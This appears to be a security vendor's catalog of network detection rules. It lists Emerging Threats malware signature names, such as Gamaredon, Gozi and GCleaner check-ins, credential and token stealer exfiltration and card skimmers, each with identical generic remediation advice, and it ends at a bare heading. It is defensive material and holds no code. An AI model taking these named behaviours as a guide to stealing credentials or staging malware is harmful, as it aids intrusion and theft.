ET MALWARE Foudre Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Foudre Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Foudre Checkin M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Foudre Checkin M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FOX-SRT ShimRat check-in (Data)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FOX-SRT ShimRat check-in (Yuok)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FOX-SRT ShimRatReporter check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FRAT Downloader Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FRAT Downloader Error Report POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FRat WebSocket Request M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FRat WebSockets Request M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FraudLoad.aww HTTP CnC Post

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fraudload/FakeAlert/FakeVimes Downloader - POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FrauDrop Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FrauDrop UA LETITGO

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FrauDrop UA single

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fruspam polling for IP likely infected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FTCode Stealer CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FTCode Stealer Init Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fullz House Credit Card Skimmer Data Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fullz House Credit Card Skimmer JavaScript Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gaboc Trojan Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Galock Ransomware Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Gamania Trojan Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon APT Maldoc Related Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon APT Related Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon/Armageddon Activity (Retrieving Remote .dot)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon/Armageddon CnC Activity (Sending Windows System Information)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon File Stealer POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon MalDoc CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Maldoc Remote Template Retrieval (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Maldoc Remote Template Retrieval (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Style MalDoc .dot Download on freedynamicdns .org

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamarue/Andromeda Downloading Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gameredon Loader Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamut Spambot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamut Spambot Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GandCrab Style External IP Check (Spoofed Yahoo Host)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GanDownloader CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gasket CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gasket Requesting Commands from CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gasket Submitting Logs to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gatak CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gazer HTTP POST Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GCleaner Downloader Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GCleaner Downloader Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GCleaner Downloader Activity M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GCleaner Downloader Activity M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GCleaner Downloader Activity M5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE General Banker.PWS POST Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE General Downloader Checkin URL (GUID+)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE General Trojan Downloader

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE General Win32 Backdoor Checkin POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE General Win32 Backdoor Checkin POST Packet 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic - 8Char.JAR Naming Algorithm

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic .bin download from Dotted Quad

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Bot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Checkin - MSCommonInfoEx

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Downloader checkin (3)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Downloader Checkin - HTTP GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Downloader - HTTP POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Dropper/Clicker Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Dropper Installing PUP 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Dropper Installing PUP 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic gate .php GET with minimal headers

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GENERIC Likely Malicious Fake IE Downloading .exe

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic.Malware.SFL User-Agent (Rescue/9.11)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic -POST To file.php w/Extended ASCII Characters

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic - POST To .php w/Extended ASCII Characters

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Request to gate.php Dotted-Quad

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Spambot (often Tibs) Post-Infection Checkin (justcount.net likely)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Trojan Checkin (UA VBTagEdit)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Trojan with /? and Indy Library User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Win32.Autorun HTTP Post

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Genome User-Agent (Http Down)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Geocon CnC Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Georbot checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Georbot initial checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Georbot requesting update

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Georgian Targeted Attack - Trojan Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GET to Google with specific HTTP lib likely Cycbot/Bifrose/Kryptic checking Internet connection

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gimemo Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GlitchPOS CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Glupteba CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Go/Anubis CnC Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GoBrut/StealthWorker Requesting Brute Force List (flowbit set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GoBrut/StealthWorker Service Bruter CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GoBrut/StealthWorker Service Bruter CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Godlua Backdoor Downloading Encrypted Lua

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Go/Hack Browser Data Exfil Attempt

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GoLang Discord Token Grabber Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GoldenSpy CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GoldenSpy CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gootkit Checkin User-Agent 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Go/PSW.Agent_AGen.A Data Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GORGON APT Download Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GORGON APT Download Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gozi/BlackNet Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gozi check-in / update

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gozi Communication 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gozi/Ursnif/Papras Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gozi/Ursnif/Papras Grabftp Module Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Grandoreiro CnC Activity (vbs)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Grandoreiro Downloader Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GreenDou Downloader User-Agent (hello crazyk)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gulpix/PlugX Client Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE H1N1 Loader CnC Beacon M1

Description
Copy link

